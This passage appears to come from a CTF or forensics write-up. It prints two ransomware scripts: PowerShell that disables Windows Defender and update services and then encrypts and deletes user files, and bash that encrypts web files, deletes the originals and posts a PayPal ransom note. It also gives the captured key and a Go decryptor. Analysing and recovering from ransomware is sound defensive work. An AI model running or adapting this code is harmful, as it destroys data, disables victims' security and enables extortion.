    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WinDefend'").StartMode) -ne "Disabled"){ set-service WinDefend -StartupType Disabled};
    spsv Wuauserv -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wuauserv'").StartMode) -ne "Disabled"){ set-service Wuauserv -StartupType Disabled};
    spsv BITS -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='BITS'").StartMode) -ne "Disabled"){ set-service BITS -StartupType Disabled};
    spsv ERSvc -ErrorAction SilentlyContinue;
    spsv WerSvc -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WerSvc'").StartMode) -ne "Disabled"){ set-service WerSvc -StartupType Disabled};
    Write-Output "Encryption phase"
    # each file is written as IV || ciphertext with a .crpt suffix, original removed
    $encryptor=$aesManaged.CreateEncryptor();
    $directory = "C:\Share"
    $files=gci $directory -Recurse -Include *.txt,*.pdf,*.docx,*.doc,*.jpg;
    foreach($file in $files) {
        $bytes=[System.IO.File]::ReadAllBytes($($file.FullName));
        $encryptedData=$encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
        [byte[]] $fullData=$aesManaged.IV + $encryptedData;
        [System.IO.File]::WriteAllBytes($($file.FullName+".crpt"),$fullData);
        Remove-Item $file;
    }
}
```

Key and IV as seen in the HTTP traffic:

```
/key=SSxL4Qg//ErUxRqy25q4h4QVKWl8x5DxjvSVl+1fEsQ=&iv=1h9JnoT0PqRzvp2fbWYNnw==&pc=OIK-CLIENT
```

Decrypted FLAG:

```
Ex minimis seminibus nascuntur ingentia.
```

---

```bash
#!/bin/bash
# random 32-hex-char IV and a 10-hex-char password
iv=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 32`
pass=`cat /dev/urandom | tr -cd 'A-F0-9' | head -c 10`
dirwalk=/var/www/html
# only top-level .php files and FLAG.txt are targeted
files=`find $dirwalk -maxdepth 1 -type f | grep -P ".php$|FLAG.txt$"`
for f in $files
do
outfile=$f.encr
# key is derived from the password and salt; the IV is passed explicitly
openssl enc -aes-256-cbc -a -salt -in $f -out $outfile -pass pass:$pass -iv $iv
rm $f
done
# ransom note to logged-in users and into /etc/motd
echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." | wall
echo "Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key." > /etc/motd
exit 0
```
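Recovering a file encrypted by the PowerShell Ransom function from 10.7.239.6, given the key and IV from its check-in request. This is an added example written for this page, not code from the writeup or the malware; `ParseCheckin`, `DecryptCrpt` and `EncryptCrpt` are names chosen here, the request path and key/IV values are the ones captured above, and the encrypted input is a constructed sample rather than a file from the host.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"strings"
)

// Checkin is what the Ransom function sends to its HTTP server.
type Checkin struct {
	Key, IV []byte
	PC      string
}

// decodeB64 accepts standard base64 with or without trailing '=' padding.
func decodeB64(s string) ([]byte, error) {
	return base64.RawStdEncoding.DecodeString(strings.TrimRight(s, "="))
}

// ParseCheckin parses "/key=<b64>&iv=<b64>&pc=<host>" by hand, because
// url.ParseQuery would turn the '+' in the base64 key into a space.
func ParseCheckin(path string) (Checkin, error) {
	var c Checkin
	for _, kv := range strings.Split(strings.TrimPrefix(path, "/"), "&") {
		parts := strings.SplitN(kv, "=", 2)
		if len(parts) != 2 {
			continue
		}
		var err error
		switch parts[0] {
		case "key":
			c.Key, err = decodeB64(parts[1])
		case "iv":
			c.IV, err = decodeB64(parts[1])
		case "pc":
			c.PC = parts[1]
		}
		if err != nil {
			return c, fmt.Errorf("bad %s parameter: %w", parts[0], err)
		}
	}
	if len(c.Key) != 32 || len(c.IV) != aes.BlockSize {
		return c, fmt.Errorf("expected a 32-byte key and a 16-byte IV")
	}
	return c, nil
}

// DecryptCrpt reverses the .crpt layout: 16-byte IV, then AES-256-CBC
// ciphertext of zero-padded plaintext (PaddingMode.Zeros). Zero padding
// is ambiguous, so genuine trailing NULs in the original file are lost.
func DecryptCrpt(key, blob []byte) ([]byte, error) {
	if len(blob) < aes.BlockSize || len(blob)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("blob is not an IV plus whole AES blocks")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv, ct := blob[:aes.BlockSize], blob[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return bytes.TrimRight(pt, "\x00"), nil
}

// EncryptCrpt mirrors the script's encryptor; used only to build a constructed sample.
func EncryptCrpt(key, iv, pt []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pad := (aes.BlockSize - len(pt)%aes.BlockSize) % aes.BlockSize
	padded := append(append([]byte{}, pt...), make([]byte, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(append([]byte{}, iv...), ct...), nil
}

func main() {
	// Request path as captured in traf.pcap; the sample file is constructed.
	c, err := ParseCheckin("/key=SSxL4Qg//ErUxRqy25q4h4QVKWl8x5DxjvSVl+1fEsQ=&iv=1h9JnoT0PqRzvp2fbWYNnw==&pc=OIK-CLIENT")
	if err != nil {
		panic(err)
	}
	blob, _ := EncryptCrpt(c.Key, c.IV, []byte("constructed sample plaintext"))
	pt, err := DecryptCrpt(c.Key, blob)
	fmt.Printf("%s: %q err=%v\n", c.PC, pt, err)
}
```

For a real `.crpt` file, read its bytes and pass them to `DecryptCrpt` with the parsed key; the IV stored in the file should match the one from the check-in.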